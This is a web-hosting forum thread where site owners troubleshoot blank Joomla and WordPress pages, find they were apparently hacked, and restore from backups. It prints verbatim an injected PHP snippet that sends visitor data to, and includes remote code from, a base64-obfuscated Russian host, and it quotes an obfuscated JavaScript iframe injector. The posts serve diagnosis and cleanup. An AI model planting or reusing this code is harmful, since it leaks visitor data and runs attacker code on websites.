Gator36 Problems?

[GaryW]

Trying to load my main web-site ..


www.strategic-quality-resources.com which is a Joomla site on Gator36 ...

Nothing is loading ... just a blank page ...

Was working OK some five hours ago ... and I have not made any changes to it ..

Anyone else having problems with Gator36 and/or Joomla ?

[Rosie M. Banks]

Yes, we are having problems as well. It's been running slow off and on for a few weeks; the Dashboard in our WordPress application would only partially load even though we'd done nothing to it.

And now this morning our site is is unreadable, like the front end is only partially loading.

Did you write to the support team?

[kmaw]

I see nothing on the quality resources site... defaults to /CMS/ after a minute, then I get a blank page..

[Rosie M. Banks]

The support tech in chat said, "We apologize for the inconvenience. Please be patient. Our system administrators are aware of the problems and are working quickly to resolve the issues" so at least we know somebody's working on it.

Didn't there used to be a status page, showing which servers were up and which were down? I tried to find it but couldn't. Something like that is very helpful because it helps me know if I've got to troubleshoot it on my end or not.

[Rosie M. Banks]

Now the chat guy says "that server did require some of the applications to be reset earlier" but that it "is most likely a coincidence" that both of our sites are not working properly.

All I know is that at 6:45 am it worked fine, and by 7:15 am it had begun this partial loading problem.

When I asked the chat guy about your problem, Gary W, he said, "It definitely seems like this has something to do with the scripts because the server appears to be working as intended now."

[GaryW]

Thanks for replies Guys/Gals ...

Yes .. I have a support ticket in on this one ... don't have the number handy at the moment ... I'm on a client's PC on-site ...

Rosie ... yes ... that is what support told me ... but this script (/CMS/index.php) is a Joomla CMS main web-site entry page ... and there has been no changes to the code in weeks ... it was working OK yesterday morning (Australia time) ... and then by about 3-00pm we got the blank page ....

kmaw ... the re-direct to the /CMS/ folder is correct ... and should then display the /CMS/index.php page ... but as you say ... you get a blank page ...

I'm away from my PC all today (Tuesday 18th Australia time) ... so won't see how support has got along until tonight ... As I write this (8-00am), the page is still blank ....

Rosie ... Yes there was a server status page that showed all the servers ... and I could not find it either ... however, on my cpanel, left hand menu bar, halfway down is a clickable link ("Server Status", I think) ... that shows various aspects of just the Gator36 server ... interestingly that last entry in the web-page showed a 99% capaciity for a "sada" or something ... with a "Red dot" indicator ... I told support about this but all subsequent emails have been focussed on my (un-changed) .php script ... Maybe you can check your cpanel and see if you see the same as me ...?

If it is not working by tonight my time ... I intend to restore to a backup from yesterday morning ... which certainly was working OK ...

[Rosie M. Banks]

Gary, I think we were hacked. I found some code inserted into my header, and I've not changed it in several weeks. I did a search on it, and found several pages suggesting it is a hack job.

Here's what I found in my header:

Code:

error_reporting(0);$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST); $b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME); $c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI); $g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT); $h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR); $n=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER); $str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($g).".".base64_encode($h).".".base64_encode($n);if((include_once(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjcucGhwaW5jbHVkZS5ydQ==")."/?".$str))){} else {include_once(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjcucGhwaW5jbHVkZS5ydQ==")."/?".$str);}?>

Look through your files and see if you find anything similar.

Hostgator People: I've been reading that shared servers can sometimes have problems like this. Can you tell if this is malicious code?

[GaryW]

Rosie ... Thanks for reply ... Yes I will be checking for suspicious files etc ...

As I said before ... what intrigued me was the fact the site had worked one minute ... and within an hour was not working ... all without any changes having been made to anything ...

When you say "header" what exactly were you looking at if you don't mind?

I did do a bit of investigation ... In Joomla you can assign a dynamic template that is then used "to paint" the look and feel of the web-page ... I have a custom made one for SQR Consulting ...

You can "on the fly" change the template from a "back end" administrator screen ...

As a test ... I went back and changed the template selection to the "stock standard" Joomla template (The one it initially uses when you first install Joomla and has not had any code script chages for months) .. Lo and behold this still shows a blank page ... so I'm heading down the path that something is hacked at the template generation stage ...

[Serra]

Quote:

Originally Posted by Rosie M. Banks

Gary, I think we were hacked. I found some code inserted into my header, and I've not changed it in several weeks. I did a search on it, and found several pages suggesting it is a hack job.

Here's what I found in my header:

Code:

error_reporting(0);$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST); $b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME); $c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI); $g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT); $h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR); $n=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER); $str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($g).".".base64_encode($h).".".base64_encode($n);if((include_once(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjcucGhwaW5jbHVkZS5ydQ==")."/?".$str))){} else {include_once(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjcucGhwaW5jbHVkZS5ydQ==")."/?".$str);}?>

Look through your files and see if you find anything similar.

Hostgator People: I've been reading that shared servers can sometimes have problems like this. Can you tell if this is malicious code?

These are include statements that are including files from http://user7.phpinclude.ru

That doesn't sound good.

[Rosie M. Banks]

GaryW, thank you for the location of the status thingy in cpanel! The only non-green one on mine says

Quote:

Disk sda7 (/home)90 %http://ncaq.org:2082/yellow-status.gif

By "header" I meant within my WordPress header.php file. The page was working fine at 6:45 am, and then by 7:15 am it wouldn't load completely, apparently because this code had been inserted.

Another page I found that talked about this kind of code mentioned javascript:

Code:

 <script language="javascript" type="text/javascript">
var k='?gly#vw|oh@%ylvlelolw|=#klgghq>#srvlwlrq=#devroxwh>#ohiw=#4>#wrs=#4%A?liudph#vuf@ %kwws=22xvhu4<1liudph1ux2Bv@4%#iudpherughu@3#yvsdfh@3#kvsdfh@3#zlgwk@4#khljkw@ 4#pdujlqzlgwk@3#pdujlqkhljkw@3#vfuroolqj@qrA?2liudphA?2glyA',t=0,h='';
while(t<=k.length-1){h=h+String.fromCharCode(k.charCodeAt(t++)-3);}

I mention this only because what seems to have loaded on your page is a little bit of javascript. Perhaps it has nothing to do with what happened to you, but it's a start.

Also, a commenter on this thread says:

Quote:

I resell hosting and have about 12 full on sites to look after all on the same shared host… (this includes mine) it was my own domain (the damn parent one at that) that got hit by a script that targets an older version of Aardvark Topsites that is vulnerable on all servers with “REGISTER_GLOBALS=TRUE” only. So guess what I’m still fixing.

Other pages that discuss the type of code that was inserted into my header.php file recommend making sure you have no directories with a 777 permission (I had none).

And finally, my two latest (and conflicting) responses from HostGator support were 1) it doesn't look like malicious code and 2) it looks like some kind of browser injection vulnerability.

I updated our WordPress software (I was running 2.02 instead of 2.03) and am hoping that will help protect us from future injections, if this is what they are.

Edited to clarify

[GaryW]

Hi Rosie .. Thanks for further info ...

got this HG support response about my support ticket ..

Quote:

We've resolved the partition usage issue, which wasn't yet a problem (but soon would have been). I'm unfamiliar with the software to know if the permissions on the generator directory would have played a role, but if you removed it then it wouldn't be an issue with the permissions. Perhaps upload the content to that directory again (recreating it if need be) and see if that helps result in your site working again?

I also had them overwrite all of my joomla application files with a backup version I had from the previous day when all was working OK ... and the website came back on-line OK ...

I certainly will check all my folder permissions etc ... and I'm also creating a "mirror" version of the web-site on the local PC ... and using a s/w package called "FTPSync" to check/compare between the server and local versions .. Hopefully this will make it easy to see any "un-approved changes" to any files on the server ...

I am going to go back and have a look at the access log files at the weekend and see if I can find the "culprit" ...